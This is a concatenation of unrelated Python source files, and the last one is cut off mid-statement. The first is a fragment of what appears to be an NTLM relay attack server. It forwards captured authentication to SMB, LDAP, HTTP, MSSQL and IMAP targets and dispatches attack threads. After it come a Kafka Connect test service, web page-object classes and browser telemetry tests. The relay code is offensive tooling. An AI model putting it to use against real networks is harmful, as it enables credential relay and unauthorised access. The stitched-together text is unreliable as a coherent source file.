result = client.sendAuth(token) if result: #This contains a boolean errorCode = STATUS_SUCCESS else: errorCode = STATUS_ACCESS_DENIED except Exception, e: logging.error("NTLM Message type 3 against %s FAILED" % self.target[1]) logging.error(str(e)) errorCode = STATUS_ACCESS_DENIED if self.target[0] == 'LDAP' or self.target[0] == 'LDAPS': #This client needs a proper response code try: result = client.sendAuth(token) #Result dict if result['result'] == 0 and result['description'] == 'success': errorCode = STATUS_SUCCESS else: logging.error("LDAP bind against %s as %s FAILED" % (self.target[1],self.authUser)) logging.error('Error: %s. Message: %s' % (result['description'],str(result['message']))) errorCode = STATUS_ACCESS_DENIED print errorCode #Failed example: #{'dn': u'', 'saslCreds': None, 'referrals': None, 'description': 'invalidCredentials', 'result': 49, 'message': u'8009030C: LdapErr: DSID-0C0905FE, comment: AcceptSecurityContext error, data 52e, v23f0\x00', 'type': 'bindResponse'} #Ok example: #{'dn': u'', 'saslCreds': None, 'referrals': None, 'description': 'success', 'result': 0, 'message': u'', 'type': 'bindResponse'} except Exception, e: logging.error("NTLM Message type 3 against %s FAILED" % self.target[1]) logging.error(str(e)) errorCode = STATUS_ACCESS_DENIED if self.target[0] == 'HTTP' or self.target[0] == 'HTTPS': try: result = client.sendAuth(token) #Result is a boolean if result: errorCode = STATUS_SUCCESS else: logging.error("HTTP NTLM auth against %s as %s FAILED" % (self.target[1],self.authUser)) errorCode = STATUS_ACCESS_DENIED except Exception, e: logging.error("NTLM Message type 3 against %s FAILED" % self.target[1]) logging.error(str(e)) errorCode = STATUS_ACCESS_DENIED if self.target[0] == 'IMAP' or self.target[0] == 'IMAPS': try: result = client.sendAuth(token) #Result is a boolean if result: errorCode = STATUS_SUCCESS else: logging.error("IMAP NTLM auth against %s as %s FAILED" % (self.target[1],self.authUser)) errorCode = STATUS_ACCESS_DENIED except Exception, e: logging.error("IMAP NTLM Message type 3 against %s FAILED" % self.target[1]) logging.error(str(e)) errorCode = STATUS_ACCESS_DENIED return clientResponse, errorCode def do_attack(self,client): #Do attack. Note that unlike the HTTP server, the config entries are stored in the current object and not in any of its properties if self.target[0] == 'SMB': clientThread = self.config.attacks['SMB'](self.config, client, self.authUser) clientThread.start() if self.target[0] == 'LDAP' or self.target[0] == 'LDAPS': clientThread = self.config.attacks['LDAP'](self.config, client, self.authUser) clientThread.start() if self.target[0] == 'HTTP' or self.target[0] == 'HTTPS': clientThread = self.config.attacks['HTTP'](self.config, client, self.authUser) clientThread.start() if self.target[0] == 'MSSQL': clientThread = self.config.attacks['MSSQL'](self.config, client) clientThread.start() if self.target[0] == 'IMAP' or self.target[0] == 'IMAPS': clientThread = self.config.attacks['IMAP'](self.config, client, self.authUser) clientThread.start() def _start(self): self.server.serve_forever() def run(self): logging.info("Setting up SMB Server") self._start()
# Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import os.path import random import signal import time import requests from ducktape.errors import DucktapeError from ducktape.services.service import Service from ducktape.utils.util import wait_until from kafkatest.directory_layout.kafka_path import KafkaPathResolverMixin from kafkatest.services.kafka.util import fix_opts_for_new_jvm class ConnectServiceBase(KafkaPathResolverMixin, Service): """Base class for Kafka Connect services providing some common settings and functionality""" PERSISTENT_ROOT = "/mnt/connect" CONFIG_FILE = os.path.join(PERSISTENT_ROOT, "connect.properties") # The log file contains normal log4j logs written using a file appender. stdout and stderr are handled separately # so they can be used for other output, e.g. verifiable source & sink. LOG_FILE = os.path.join(PERSISTENT_ROOT, "connect.log") STDOUT_FILE = os.path.join(PERSISTENT_ROOT, "connect.stdout") STDERR_FILE = os.path.join(PERSISTENT_ROOT, "connect.stderr") LOG4J_CONFIG_FILE = os.path.join(PERSISTENT_ROOT, "connect-log4j.properties") PID_FILE = os.path.join(PERSISTENT_ROOT, "connect.pid") EXTERNAL_CONFIGS_FILE = os.path.join(PERSISTENT_ROOT, "connect-external-configs.properties") CONNECT_REST_PORT = 8083 HEAP_DUMP_FILE = os.path.join(PERSISTENT_ROOT, "connect_heap_dump.bin") # Currently the Connect worker supports waiting on three modes: STARTUP_MODE_INSTANT = 'INSTANT' """STARTUP_MODE_INSTANT: Start Connect worker and return immediately""" STARTUP_MODE_LOAD = 'LOAD' """STARTUP_MODE_LOAD: Start Connect worker and return after discovering and loading plugins""" STARTUP_MODE_LISTEN = 'LISTEN' """STARTUP_MODE_LISTEN: Start Connect worker and return after opening the REST port.""" logs = { "connect_log": { "path": LOG_FILE, "collect_default": True}, "connect_stdout": { "path": STDOUT_FILE, "collect_default": False}, "connect_stderr": { "path": STDERR_FILE, "collect_default": True}, "connect_heap_dump_file": { "path": HEAP_DUMP_FILE, "collect_default": True} } def __init__(self, context, num_nodes, kafka, files, startup_timeout_sec = 60): super(ConnectServiceBase, self).__init__(context, num_nodes) self.kafka = kafka self.security_config = kafka.security_config.client_config() self.files = files self.startup_mode = self.STARTUP_MODE_LISTEN self.startup_timeout_sec = startup_timeout_sec self.environment = {} self.external_config_template_func = None def pids(self, node): """Return process ids for Kafka Connect processes.""" try: return [pid for pid in node.account.ssh_capture("cat " + self.PID_FILE, callback=int)] except: return [] def set_configs(self, config_template_func, connector_config_templates=None): """ Set configurations for the worker and the connector to run on it. These are not provided in the constructor because the worker config generally needs access to ZK/Kafka services to create the configuration. """ self.config_template_func = config_template_func self.connector_config_templates = connector_config_templates def set_external_configs(self, external_config_template_func): """ Set the properties that will be written in the external file properties as used by the org.apache.kafka.common.config.provider.FileConfigProvider. When this is used, the worker configuration must also enable the FileConfigProvider. This is not provided in the constructor in case the worker config generally needs access to ZK/Kafka services to create the configuration. """ self.external_config_template_func = external_config_template_func def listening(self, node): try: self.list_connectors(node) self.logger.debug("Connect worker started serving REST at: '%s:%s')", node.account.hostname, self.CONNECT_REST_PORT) return True except requests.exceptions.ConnectionError: self.logger.debug("REST resources are not loaded yet") return False def start(self, mode=STARTUP_MODE_LISTEN): self.startup_mode = mode super(ConnectServiceBase, self).start() def start_and_return_immediately(self, node, worker_type, remote_connector_configs): cmd = self.start_cmd(node, remote_connector_configs) self.logger.debug("Connect %s command: %s", worker_type, cmd) node.account.ssh(cmd) def start_and_wait_to_load_plugins(self, node, worker_type, remote_connector_configs): with node.account.monitor_log(self.LOG_FILE) as monitor: self.start_and_return_immediately(node, worker_type, remote_connector_configs) monitor.wait_until('Kafka version', timeout_sec=self.startup_timeout_sec, err_msg="Never saw message indicating Kafka Connect finished startup on node: " + "%s in condition mode: %s" % (str(node.account), self.startup_mode)) def start_and_wait_to_start_listening(self, node, worker_type, remote_connector_configs): self.start_and_return_immediately(node, worker_type, remote_connector_configs) wait_until(lambda: self.listening(node), timeout_sec=self.startup_timeout_sec, err_msg="Kafka Connect failed to start on node: %s in condition mode: %s" % (str(node.account), self.startup_mode)) def stop_node(self, node, clean_shutdown=True): self.logger.info((clean_shutdown and "Cleanly" or "Forcibly") + " stopping Kafka Connect on " + str(node.account)) pids = self.pids(node) sig = signal.SIGTERM if clean_shutdown else signal.SIGKILL for pid in pids: node.account.signal(pid, sig, allow_fail=True) if clean_shutdown: for pid in pids: wait_until(lambda: not node.account.alive(pid), timeout_sec=self.startup_timeout_sec, err_msg="Kafka Connect process on " + str( node.account) + " took too long to exit") node.account.ssh("rm -f " + self.PID_FILE, allow_fail=False) def restart(self, clean_shutdown=True): # We don't want to do any clean up here, just restart the process. for node in self.nodes: self.logger.info("Restarting Kafka Connect on " + str(node.account)) self.restart_node(node, clean_shutdown) def restart_node(self, node, clean_shutdown=True): self.stop_node(node, clean_shutdown) self.start_node(node) def clean_node(self, node): node.account.kill_process("connect", clean_shutdown=False, allow_fail=True) self.security_config.clean_node(node) other_files = " ".join(self.config_filenames() + self.files) node.account.ssh("rm -rf -- %s %s" % (ConnectServiceBase.PERSISTENT_ROOT, other_files), allow_fail=False) def config_filenames(self): return [os.path.join(self.PERSISTENT_ROOT, "connect-connector-" + str(idx) + ".properties") for idx, template in enumerate(self.connector_config_templates or [])] def list_connectors(self, node=None, **kwargs): return self._rest_with_retry('/connectors', node=node, **kwargs) def create_connector(self, config, node=None, **kwargs): create_request = { 'name': config['name'], 'config': config } return self._rest_with_retry('/connectors', create_request, node=node, method="POST", **kwargs) def get_connector(self, name, node=None, **kwargs): return self._rest_with_retry('/connectors/' + name, node=node, **kwargs) def get_connector_config(self, name, node=None, **kwargs): return self._rest_with_retry('/connectors/' + name + '/config', node=node, **kwargs) def set_connector_config(self, name, config, node=None, **kwargs): # Unlike many other calls, a 409 when setting a connector config is expected if the connector already exists. # However, we also might see 409s for other reasons (e.g. rebalancing). So we still perform retries at the cost # of tests possibly taking longer to ultimately fail. Tests that care about this can explicitly override the # number of retries. return self._rest_with_retry('/connectors/' + name + '/config', config, node=node, method="PUT", **kwargs) def get_connector_tasks(self, name, node=None, **kwargs): return self._rest_with_retry('/connectors/' + name + '/tasks', node=node, **kwargs) def delete_connector(self, name, node=None, **kwargs): return self._rest_with_retry('/connectors/' + name, node=node, method="DELETE", **kwargs) def get_connector_status(self, name, node=None): return self._rest('/connectors/' + name + '/status', node=node) def restart_connector(self, name, node=None, **kwargs): return self._rest_with_retry('/connectors/' + name + '/restart', node=node, method="POST", **kwargs) def restart_task(self, connector_name, task_id, node=None): return self._rest('/connectors/' + connector_name + '/tasks/' + str(task_id) + '/restart', node=node, method="POST") def pause_connector(self, name, node=None): return self._rest('/connectors/' + name + '/pause', node=node, method="PUT") def resume_connector(self, name, node=None): return self._rest('/connectors/' + name + '/resume', node=node, method="PUT") def list_connector_plugins(self, node=None): return self._rest('/connector-plugins/', node=node) def validate_config(self, connector_type, validate_request, node=None): return self._rest('/connector-plugins/' + connector_type + '/config/validate', validate_request, node=node, method="PUT") def _rest(self, path, body=None, node=None, method="GET"): if node is None: node = random.choice(self.nodes) meth = getattr(requests, method.lower()) url = self._base_url(node) + path self.logger.debug("Kafka Connect REST request: %s %s %s %s", node.account.hostname, url, method, body) resp = meth(url, json=body) self.logger.debug("%s %s response: %d", url, method, resp.status_code) if resp.status_code > 400: self.logger.debug("Connect REST API error for %s: %d %s", resp.url, resp.status_code, resp.text) raise ConnectRestError(resp.status_code, resp.text, resp.url) if resp.status_code == 204 or resp.status_code == 202: return None else: return resp.json() def _rest_with_retry(self, path, body=None, node=None, method="GET", retries=40, retry_backoff=.25): """ Invokes a REST API with retries for errors that may occur during normal operation (notably 409 CONFLICT responses that can occur due to rebalancing or 404 when the connect resources are not initialized yet). """ exception_to_throw = None for i in range(0, retries + 1): try: return self._rest(path, body, node, method) except ConnectRestError as e: exception_to_throw = e if e.status != 409 and e.status != 404: break time.sleep(retry_backoff) raise exception_to_throw def _base_url(self, node): return 'http://' + node.account.externally_routable_ip + ':' + str(self.CONNECT_REST_PORT) def append_to_environment_variable(self, envvar, value): env_opts = self.environment[envvar] if env_opts is None: env_opts = "\"%s\"" % value else: env_opts = "\"%s %s\"" % (env_opts.strip('\"'), value) self.environment[envvar] = env_opts class ConnectStandaloneService(ConnectServiceBase): """Runs Kafka Connect in standalone mode.""" def __init__(self, context, kafka, files, startup_timeout_sec = 60): super(ConnectStandaloneService, self).__init__(context, 1, kafka, files, startup_timeout_sec) # For convenience since this service only makes sense with a single node @property def node(self): return self.nodes[0] def start_cmd(self, node, connector_configs): cmd = "( export KAFKA_LOG4J_OPTS=\"-Dlog4j.configuration=file:%s\"; " % self.LOG4J_CONFIG_FILE heap_kafka_opts = "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=%s" % \ self.logs["connect_heap_dump_file"]["path"] other_kafka_opts = self.security_config.kafka_opts.strip('\"') cmd += fix_opts_for_new_jvm(node) cmd += "export KAFKA_OPTS=\"%s %s\"; " % (heap_kafka_opts, other_kafka_opts) for envvar in self.environment: cmd += "export %s=%s; " % (envvar, str(self.environment[envvar])) cmd += "%s %s " % (self.path.script("connect-standalone.sh", node), self.CONFIG_FILE) cmd += " ".join(connector_configs) cmd += " & echo $! >&3 ) 1>> %s 2>> %s 3> %s" % (self.STDOUT_FILE, self.STDERR_FILE, self.PID_FILE) return cmd def start_node(self, node): node.account.ssh("mkdir -p %s" % self.PERSISTENT_ROOT, allow_fail=False) self.security_config.setup_node(node) if self.external_config_template_func: node.account.create_file(self.EXTERNAL_CONFIGS_FILE, self.external_config_template_func(node)) node.account.create_file(self.CONFIG_FILE, self.config_template_func(node)) node.account.create_file(self.LOG4J_CONFIG_FILE, self.render('connect_log4j.properties', log_file=self.LOG_FILE)) remote_connector_configs = [] for idx, template in enumerate(self.connector_config_templates): target_file = os.path.join(self.PERSISTENT_ROOT, "connect-connector-" + str(idx) + ".properties") node.account.create_file(target_file, template) remote_connector_configs.append(target_file) self.logger.info("Starting Kafka Connect standalone process on " + str(node.account)) if self.startup_mode == self.STARTUP_MODE_LOAD: self.start_and_wait_to_load_plugins(node, 'standalone', remote_connector_configs) elif self.startup_mode == self.STARTUP_MODE_INSTANT: self.start_and_return_immediately(node, 'standalone', remote_connector_configs) else: # The default mode is to wait until the complete startup of the worker self.start_and_wait_to_start_listening(node, 'standalone', remote_connector_configs) if len(self.pids(node)) == 0: raise RuntimeError("No process ids recorded") class ConnectDistributedService(ConnectServiceBase): """Runs Kafka Connect in distributed mode.""" def __init__(self, context, num_nodes, kafka, files, offsets_topic="connect-offsets", configs_topic="connect-configs", status_topic="connect-status", startup_timeout_sec = 60): super(ConnectDistributedService, self).__init__(context, num_nodes, kafka, files, startup_timeout_sec) self.offsets_topic = offsets_topic self.configs_topic = configs_topic self.status_topic = status_topic # connector_configs argument is intentionally ignored in distributed service. def start_cmd(self, node, connector_configs): cmd = "( export KAFKA_LOG4J_OPTS=\"-Dlog4j.configuration=file:%s\"; " % self.LOG4J_CONFIG_FILE heap_kafka_opts = "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=%s" % \ self.logs["connect_heap_dump_file"]["path"] other_kafka_opts = self.security_config.kafka_opts.strip('\"') cmd += "export KAFKA_OPTS=\"%s %s\"; " % (heap_kafka_opts, other_kafka_opts) for envvar in self.environment: cmd += "export %s=%s; " % (envvar, str(self.environment[envvar])) cmd += "%s %s " % (self.path.script("connect-distributed.sh", node), self.CONFIG_FILE) cmd += " & echo $! >&3 ) 1>> %s 2>> %s 3> %s" % (self.STDOUT_FILE, self.STDERR_FILE, self.PID_FILE) return cmd def start_node(self, node): node.account.ssh("mkdir -p %s" % self.PERSISTENT_ROOT, allow_fail=False) self.security_config.setup_node(node) if self.external_config_template_func: node.account.create_file(self.EXTERNAL_CONFIGS_FILE, self.external_config_template_func(node)) node.account.create_file(self.CONFIG_FILE, self.config_template_func(node)) node.account.create_file(self.LOG4J_CONFIG_FILE, self.render('connect_log4j.properties', log_file=self.LOG_FILE)) if self.connector_config_templates: raise DucktapeError("Config files are not valid in distributed mode, submit connectors via the REST API") self.logger.info("Starting Kafka Connect distributed process on " + str(node.account)) if self.startup_mode == self.STARTUP_MODE_LOAD: self.start_and_wait_to_load_plugins(node, 'distributed', '') elif self.startup_mode == self.STARTUP_MODE_INSTANT: self.start_and_return_immediately(node, 'distributed', '') else: # The default mode is to wait until the complete startup of the worker self.start_and_wait_to_start_listening(node, 'distributed', '') if len(self.pids(node)) == 0: raise RuntimeError("No process ids recorded") class ErrorTolerance(object): ALL = "all" NONE = "none" class ConnectRestError(RuntimeError): def __init__(self, status, msg, url): self.status = status self.message = msg self.url = url def __unicode__(self): return "Kafka Connect REST call failed: returned " + self.status + " for " + self.url + ". Response: " + self.message class VerifiableConnector(object): def messages(self): """ Collect and parse the logs from Kafka Connect nodes. Return a list containing all parsed JSON messages generated by this source. """ self.logger.info("Collecting messages from log of %s %s", type(self).__name__, self.name) records = [] for node in self.cc.nodes: for line in node.account.ssh_capture('cat ' + self.cc.STDOUT_FILE): try: data = json.loads(line) except ValueError: self.logger.debug("Ignoring unparseable line: %s", line) continue # Filter to only ones matching our name to support multiple verifiable producers if data['name'] != self.name: continue data['node'] = node records.append(data) return records def stop(self): self.logger.info("Destroying connector %s %s", type(self).__name__, self.name) self.cc.delete_connector(self.name) class VerifiableSource(VerifiableConnector): """ Helper class for running a verifiable source connector on a Kafka Connect cluster and analyzing the output. """ def __init__(self, cc, name="verifiable-source", tasks=1, topic="verifiable", throughput=1000): self.cc = cc self.logger = self.cc.logger self.name = name self.tasks = tasks self.topic = topic self.throughput = throughput def committed_messages(self): return filter(lambda m: 'committed' in m and m['committed'], self.messages()) def sent_messages(self): return filter(lambda m: 'committed' not in m or not m['committed'], self.messages()) def start(self): self.logger.info("Creating connector VerifiableSourceConnector %s", self.name) self.cc.create_connector({ 'name': self.name, 'connector.class': 'org.apache.kafka.connect.tools.VerifiableSourceConnector', 'tasks.max': self.tasks, 'topic': self.topic, 'throughput': self.throughput }) class VerifiableSink(VerifiableConnector): """ Helper class for running a verifiable sink connector on a Kafka Connect cluster and analyzing the output. """ def __init__(self, cc, name="verifiable-sink", tasks=1, topics=["verifiable"]): self.cc = cc self.logger = self.cc.logger self.name = name self.tasks = tasks self.topics = topics def flushed_messages(self): return filter(lambda m: 'flushed' in m and m['flushed'], self.messages()) def received_messages(self): return filter(lambda m: 'flushed' not in m or not m['flushed'], self.messages()) def start(self): self.logger.info("Creating connector VerifiableSinkConnector %s", self.name) self.cc.create_connector({ 'name': self.name, 'connector.class': 'org.apache.kafka.connect.tools.VerifiableSinkConnector', 'tasks.max': self.tasks, 'topics': ",".join(self.topics) }) class MockSink(object): def __init__(self, cc, topics, mode=None, delay_sec=10, name="mock-sink"): self.cc = cc self.logger = self.cc.logger self.name = name self.mode = mode self.delay_sec = delay_sec self.topics = topics def start(self): self.logger.info("Creating connector MockSinkConnector %s", self.name) self.cc.create_connector({ 'name': self.name, 'connector.class': 'org.apache.kafka.connect.tools.MockSinkConnector', 'tasks.max': 1, 'topics': ",".join(self.topics), 'mock_mode': self.mode, 'delay_ms': self.delay_sec * 1000 }) class MockSource(object): def __init__(self, cc, mode=None, delay_sec=10, name="mock-source"): self.cc = cc self.logger = self.cc.logger self.name = name self.mode = mode self.delay_sec = delay_sec def start(self): self.logger.info("Creating connector MockSourceConnector %s", self.name) self.cc.create_connector({ 'name': self.name, 'connector.class': 'org.apache.kafka.connect.tools.MockSourceConnector', 'tasks.max': 1, 'mock_mode': self.mode, 'delay_ms': self.delay_sec * 1000 })
# Copyright (C) 2016 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> """Page object models for the info widget of the object""" from lib import base from lib.constants import locator from lib.element import widget_info class Widget(base.Widget): """Abstract class for all info widgets""" _locator = None _dropdown_settings_cls = None def __init__(self, driver): # wait that the elements load before calling super self.button_settings = base.Button( driver, locator.BaseInfoWidget.BUTTON_SETTINGS) self.title = base.Label(driver, self._locator.TITLE) self.title_entered = base.Label( driver, self._locator.TITLE_ENTERED) super(Widget, self).__init__(driver) self.object_id = self.url.split("/")[-1] def press_object_settings(self): """ Returns: widget_info.DropdownSettings """ self.button_settings.click() return self._dropdown_settings_cls(self._driver) class DashboardInfo(Widget): """Model for the dashboard info widget""" _locator = locator.Dashboard def __init__(self, driver): super(DashboardInfo, self).__init__(driver) self.button_start_new_program = base.Button( self._driver, self._locator.BUTTON_START_NEW_PROGRAM) self.button_start_new_audit = base.Button( self._driver, self._locator.BUTTON_START_NEW_AUDIT) self.button_start_new_workflow = base.Button( self._driver, self._locator.BUTTON_START_NEW_WORKFLOW) self.button_create_new_object = base.Button( self._driver, self._locator.BUTTON_CREATE_NEW_OBJECT) self.button_all_objects = base.Button( self._driver, self._locator.BUTTON_ALL_OBJECTS) def start_new_program(self): raise NotImplementedError def start_new_audit(self): raise NotImplementedError def start_new_workflow(self): raise NotImplementedError def create_new_object(self): raise NotImplementedError def browse_all_objects(self): raise NotImplementedError class Programs(Widget): """Model for program object info widget""" _locator = locator.WidgetInfoProgram _dropdown_settings_cls = widget_info.Programs def __init__(self, driver): """ Args: driver (base.CustomDriver) """ super(Programs, self).__init__(driver) self.show_advanced = base.Toggle( self._driver, self._locator.TOGGLE_SHOW_ADVANCED) # activate all fields self.show_advanced.toggle() self.object_review = base.Label( self._driver, self._locator.OBJECT_REVIEW) self.submit_for_review = base.Label( self._driver, self._locator.SUBMIT_FOR_REVIEW) self.description = base.Label(self._driver, self._locator.DESCRIPTION) self.description_entered = base.Label( self._driver, self._locator.DESCRIPTION_ENTERED) self.notes = base.Label(self._driver, self._locator.NOTES) self.notes_entered = base.Label( self._driver, self._locator.NOTES_ENTERED) self.manager = base.Label(self._driver, self._locator.MANAGER) self.manager_entered = base.Label( self._driver, self._locator.MANAGER_ENTERED) self.program_url = base.Label(self._driver, self._locator.PROGRAM_URL) self.program_url_entered = base.Label( self._driver, self._locator.PROGRAM_URL_ENTERED) self.code = base.Label(self._driver, self._locator.CODE) self.code_entered = base.Label( self._driver, self._locator.CODE_ENTERED) self.effective_date = base.Label( self._driver, self._locator.EFFECTIVE_DATE) self.effective_date_entered = base.Label( self._driver, self._locator.EFFECTIVE_DATE_ENTERED) self.stop_date = base.Label(self._driver, self._locator.STOP_DATE) self.stop_date_entered = base.Label( self._driver, self._locator.STOP_DATE_ENTERED) self.primary_contact = base.Label( self._driver, self._locator.PRIMARY_CONTACT) self.primary_contact_entered = base.Label( self._driver, self._locator.PRIMARY_CONTACT_ENTERED) self.secondary_contact = base.Label( self._driver, self._locator.SECONDARY_CONTACT) self.secondary_contact_entered = base.Label( self._driver, self._locator.SECONDARY_CONTACT_ENTERED) self.reference_url = base.Label( self._driver, self._locator.REFERENCE_URL) self.reference_url_entered = base.Label( self._driver, self._locator.REFERENCE_URL_ENTERED) class Workflows(Widget): """Model for workflow object info widget""" _locator = locator.WidgetInfoWorkflow class Audits(Widget): """Model for audit object info widget""" _locator = locator.WidgetInfoAudit class Assessments(Widget): """Model for assessment object info widget""" _locator = locator.WidgetInfoAssessment class Requests(Widget): """Model for request object info widget""" _locator = locator.WidgetInfoRequest class Issues(Widget): """Model for issue object info widget""" _locator = locator.WidgetInfoIssue class Regulations(Widget): """Model for regulation object info widget""" _locator = locator.WidgetInfoRegulations class Policies(Widget): """Model for policies object info widget""" _locator = locator.WidgetInfoPolicy class Standards(Widget): """Model for standard object info widget""" _locator = locator.WidgetInfoStandard class Contracts(Widget): """Model for contract object info widget""" _locator = locator.WidgetInfoContract class Clauses(Widget): """Model for clause object info widget""" _locator = locator.WidgetInfoClause class Sections(Widget): """Model for selection object info widget""" _locator = locator.WidgetInfoSection class Controls(Widget): """Model for control object info widget""" _locator = locator.WidgetInfoControl _dropdown_settings_cls = widget_info.Controls class Objectives(Widget): """Model for objectives object info widget""" _locator = locator.WidgetInfoObjective class People(base.Widget): """Model for people object info widget""" _locator = locator.WidgetInfoPeople class OrgGroups(Widget): """Model for org groups object info widget""" _locator = locator.WidgetInfoOrgGroup _dropdown_settings_cls = widget_info.OrgGroups class Vendors(Widget): """Model for vendors object info widget""" _locator = locator.WidgetInfoVendor class AccessGroup(Widget): """Model for access group object info widget""" _locator = locator.WidgetInfoAccessGroup class Systems(Widget): """Model for system object info widget""" _locator = locator.WidgetInfoSystem _dropdown_settings_cls = widget_info.Systems class Processes(Widget): """Model for process object info widget""" _locator = locator.WidgetInfoProcess _dropdown_settings_cls = widget_info.Processes class DataAssets(Widget): """Model for data asset object info widget""" _locator = locator.WidgetInfoDataAsset _dropdown_settings_cls = widget_info.DataAssets class Products(Widget): """Model for product object info widget""" _locator = locator.WidgetInfoProduct _dropdown_settings_cls = widget_info.Products class Projects(Widget): """Model for project object info widget""" _locator = locator.WidgetInfoProject _dropdown_settings_cls = widget_info.Projects class Facilities(Widget): """Model for facility object info widget""" _locator = locator.WidgetInfoFacility class Markets(Widget): """Model for market object info widget""" _locator = locator.WidgetInfoMarket class Risks(Widget): """Model for risk object info widget""" _locator = locator.WidgetInfoRisk class Threats(Widget): """Model for threat object info widget""" _locator = locator.WidgetInfoThreat
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from telemetry import benchmark from telemetry.core import exceptions from telemetry.core import util from telemetry.core.platform import tracing_category_filter from telemetry.core.platform import tracing_options from telemetry.page.actions import action_runner as action_runner_module from telemetry.page.actions import page_action from telemetry.timeline import model from telemetry.unittest import tab_test_case from telemetry.web_perf import timeline_interaction_record as tir_module class ActionRunnerInteractionTest(tab_test_case.TabTestCase): def GetInteractionRecords(self, trace_data): timeline_model = model.TimelineModel(trace_data) renderer_thread = timeline_model.GetRendererThreadFromTabId(self._tab.id) return [ tir_module.TimelineInteractionRecord.FromAsyncEvent(e) for e in renderer_thread.async_slices if tir_module.IsTimelineInteractionRecord(e.name) ] def VerifyIssuingInteractionRecords(self, **interaction_kwargs): action_runner = action_runner_module.ActionRunner(self._tab, skip_waits=True) self.Navigate('interaction_enabled_page.html') action_runner.Wait(1) options = tracing_options.TracingOptions() options.enable_chrome_trace = True self._browser.platform.tracing_controller.Start( options, tracing_category_filter.CreateNoOverheadFilter()) interaction = action_runner.BeginInteraction('InteractionName', **interaction_kwargs) interaction.End() trace_data = self._browser.platform.tracing_controller.Stop() records = self.GetInteractionRecords(trace_data) self.assertEqual( 1, len(records), 'Failed to issue the interaction record on the tracing timeline.' ' Trace data:\n%s' % repr(trace_data.EventData())) self.assertEqual('InteractionName', records[0].label) for attribute_name in interaction_kwargs: self.assertTrue(getattr(records[0], attribute_name)) @benchmark.Disabled('chromeos') def testIssuingMultipleMeasurementInteractionRecords(self): self.VerifyIssuingInteractionRecords(is_fast=True) self.VerifyIssuingInteractionRecords(is_responsive=True) self.VerifyIssuingInteractionRecords(is_smooth=True) self.VerifyIssuingInteractionRecords(is_fast=True, is_smooth=True) class ActionRunnerTest(tab_test_case.TabTestCase): def testExecuteJavaScript(self): action_runner = action_runner_module.ActionRunner(self._tab, skip_waits=True) self.Navigate('blank.html') action_runner.ExecuteJavaScript('var testing = 42;') self.assertEqual(42, self._tab.EvaluateJavaScript('testing')) def testWaitForNavigate(self): self.Navigate('page_with_link.html') action_runner = action_runner_module.ActionRunner(self._tab, skip_waits=True) action_runner.ClickElement('#clickme') action_runner.WaitForNavigate() self.assertTrue(self._tab.EvaluateJavaScript( 'document.readyState == "interactive" || ' 'document.readyState == "complete"')) self.assertEqual( self._tab.EvaluateJavaScript('document.location.pathname;'), '/blank.html') def testWait(self): action_runner = action_runner_module.ActionRunner(self._tab) self.Navigate('blank.html') action_runner.ExecuteJavaScript( 'window.setTimeout(function() { window.testing = 101; }, 50);') action_runner.Wait(0.1) self.assertEqual(101, self._tab.EvaluateJavaScript('window.testing')) action_runner.ExecuteJavaScript( 'window.setTimeout(function() { window.testing = 102; }, 100);') action_runner.Wait(0.2) self.assertEqual(102, self._tab.EvaluateJavaScript('window.testing')) def testWaitForJavaScriptCondition(self): action_runner = action_runner_module.ActionRunner(self._tab, skip_waits=True) self.Navigate('blank.html') action_runner.ExecuteJavaScript('window.testing = 219;') action_runner.WaitForJavaScriptCondition( 'window.testing == 219', timeout_in_seconds=0.1) action_runner.ExecuteJavaScript( 'window.setTimeout(function() { window.testing = 220; }, 50);') action_runner.WaitForJavaScriptCondition( 'window.testing == 220', timeout_in_seconds=0.1) self.assertEqual(220, self._tab.EvaluateJavaScript('window.testing')) def testWaitForElement(self): action_runner = action_runner_module.ActionRunner(self._tab, skip_waits=True) self.Navigate('blank.html') action_runner.ExecuteJavaScript( '(function() {' ' var el = document.createElement("div");' ' el.id = "test1";' ' el.textContent = "foo";' ' document.body.appendChild(el);' '})()') action_runner.WaitForElement('#test1', timeout_in_seconds=0.1) action_runner.WaitForElement(text='foo', timeout_in_seconds=0.1) action_runner.WaitForElement( element_function='document.getElementById("test1")') action_runner.ExecuteJavaScript( 'window.setTimeout(function() {' ' var el = document.createElement("div");' ' el.id = "test2";' ' document.body.appendChild(el);' '}, 50)') action_runner.WaitForElement('#test2', timeout_in_seconds=0.1) action_runner.ExecuteJavaScript( 'window.setTimeout(function() {' ' document.getElementById("test2").textContent = "bar";' '}, 50)') action_runner.WaitForElement(text='bar', timeout_in_seconds=0.1) action_runner.ExecuteJavaScript( 'window.setTimeout(function() {' ' var el = document.createElement("div");' ' el.id = "test3";' ' document.body.appendChild(el);' '}, 50)') action_runner.WaitForElement( element_function='document.getElementById("test3")') def testWaitForElementWithWrongText(self): action_runner = action_runner_module.ActionRunner(self._tab, skip_waits=True) self.Navigate('blank.html') action_runner.ExecuteJavaScript( '(function() {' ' var el = document.createElement("div");' ' el.id = "test1";' ' el.textContent = "foo";' ' document.body.appendChild(el);' '})()') action_runner.WaitForElement('#test1', timeout_in_seconds=0.2) def WaitForElement(): action_runner.WaitForElement(text='oo', timeout_in_seconds=0.2) self.assertRaises(util.TimeoutException, WaitForElement) def testClickElement(self): self.Navigate('page_with_clickables.html') action_runner = action_runner_module.ActionRunner(self._tab, skip_waits=True) action_runner.ExecuteJavaScript('valueSettableByTest = 1;') action_runner.ClickElement('#test') self.assertEqual(1, action_runner.EvaluateJavaScript('valueToTest')) action_runner.ExecuteJavaScript('valueSettableByTest = 2;') action_runner.ClickElement(text='Click/tap me') self.assertEqual(2, action_runner.EvaluateJavaScript('valueToTest')) action_runner.ExecuteJavaScript('valueSettableByTest = 3;') action_runner.ClickElement( element_function='document.body.firstElementChild;') self.assertEqual(3, 